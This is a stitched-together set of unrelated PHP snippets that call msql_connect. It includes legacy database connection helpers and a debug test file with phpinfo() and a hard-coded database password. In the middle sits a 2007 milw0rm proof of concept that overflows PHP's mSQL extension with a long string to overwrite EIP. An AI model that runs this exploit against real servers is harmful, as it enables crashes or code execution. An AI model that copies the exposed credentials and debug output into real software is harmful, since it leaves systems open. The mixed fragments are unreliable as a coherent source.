function sql_connect($host, $user, $password, $db) { global $dbtype; switch ($dbtype) { case "MySQL": $dbi = @mysql_connect($host, $user, $password); mysql_select_db($db); return $dbi; break; case "mSQL": $dbi = msql_connect($host); msql_select_db($db); return $dbi; break; case "postgres": $dbi = @pg_connect("host={$host} user={$user} password={$password} port=5432 dbname={$db}"); return $dbi; break; case "postgres_local": $dbi = @pg_connect("user={$user} password={$password} dbname={$db}"); return $dbi; break; case "ODBC": $dbi = @odbc_connect($db, $user, $password); return $dbi; break; case "ODBC_Adabas": $dbi = @odbc_connect($host . ":" . $db, $user, $password); return $dbi; break; case "Interbase": $dbi = @ibase_connect($host . ":" . $db, $user, $password); return $dbi; break; case "Sybase": $dbi = @sybase_connect($host, $user, $password); sybase_select_db($db, $dbi); return $dbi; break; default: break; } }
function OpenDataBase($dbinfo) { global $msql_db; if (!($dbc = msql_connect())) { $msg = gettext("Cannot establish connection to database, giving up."); $msg .= "<BR>"; $msg .= sprintf(gettext("Error message: %s"), msql_error()); ExitWiki($msg); } if (!msql_select_db($msql_db, $dbc)) { $msg = gettext("Cannot open database %s, giving up."); $msg .= "<BR>"; $msg .= sprintf(gettext("Error message: %s"), msql_error()); ExitWiki($msg); } $dbi['dbc'] = $dbc; $dbi['table'] = $dbinfo['table']; // page metadata $dbi['page_table'] = $dbinfo['page_table']; // page content return $dbi; }
<?php ########################################################## ###----------------------------------------------------### ###----PHP mSQL (msql_connect) Buffer Overflow PoC-----### ###----------------------------------------------------### ###-Tested on 5.2.3 (XP SP2)---------------------------### ###----------------------------------------------------### ###-Author:--NetJackal---------------------------------### ###-Email:---nima_501[at]yahoo[dot]com-----------------### ###-Website:-http://netjackal.by.ru--------------------### ###----------------------------------------------------### ########################################################## if (!function_exists('msql_connect')) { die('mSQL extension is not available'); } #msql_pconnect(str_repeat('A',49424).'BBBB'); msql_connect(str_repeat('A', 49424) . 'BBBB'); # EIP => 42424242 ?> # milw0rm.com [2007-08-06]
<?php phpinfo(); ini_set('display_errors', 'On'); //$c = new PDO("sqlsrv:Server=localhost;Database=thrivedcs", "thrivedcs", "WillThrive1"); //$sync_r = mssql_connect("localhost", "thrivedcs", "WillThrive1"); $sync_r = msql_connect(); print $sync_r; print "test.php";
function sql_connect($host, $user, $password, $db) { global $dbtype; switch ($dbtype) { case "MySQL": $dbi = @mysql_connect($host, $user, $password); if (!mysql_select_db($db)) { mysql_query("CREATE DATABASE {$db}"); mysql_select_db($db); include 'install.php'; die; } return $dbi; break; case "mSQL": $dbi = msql_connect($host); if (!msql_select_db($db)) { msql_query("CREATE DATABASE {$db}"); msql_select_db($db); include 'install.php'; die; } return $dbi; break; case "PostgreSQL": $dbi = @pg_connect("host={$host} user={$user} password={$password} port=5432 dbname={$db}"); return $dbi; break; case "PostgreSQL_local": $dbi = @pg_connect("user={$user} password={$password} dbname={$db}"); return $dbi; break; case "ODBC": $dbi = @odbc_connect($db, $user, $password); return $dbi; break; case "ODBC_Adabas": $dbi = @odbc_connect($host . ":" . $db, $user, $password); return $dbi; break; case "Interbase": $dbi = @ibase_connect($host . ":" . $db, $user, $password); return $dbi; break; case "Sybase": $dbi = @sybase_connect($host, $user, $password); if (!sybase_select_db($db, $dbi)) { sybase_query("CREATE DATABASE {$db}", $dbi); sybase_select_db($db, $dbi); include 'install.php'; die; } return $dbi; break; default: break; } }
function connect_msql($host, $user, $pass, $db) { $this->msql_link = msql_connect($host, $user, $pass); if ($this->msql_link == 0) { return false; } if (!msql_select_db($db, $this->msql_link)) { print "Database Error " . msql_error(); return false; } return $this->msql_link; }